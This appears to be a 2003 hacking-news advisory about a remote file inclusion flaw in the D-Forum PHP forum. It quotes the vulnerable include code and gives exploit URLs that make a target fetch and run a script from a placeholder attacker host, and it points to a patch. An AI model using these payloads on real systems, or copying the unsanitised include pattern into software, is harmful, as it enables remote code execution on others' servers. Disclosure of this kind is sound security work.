Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » D-Forum (PHP) bug

D-Forum (PHP) bug

by Nikola Strahija on February 18th, 2003 There is bug in D-forum.


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

/includes/header.php3 :
---------------------------
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--------------------------


/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---------------------------



Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt
with
http://[attacker]/script.txt


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .

More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt




[email protected]





Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »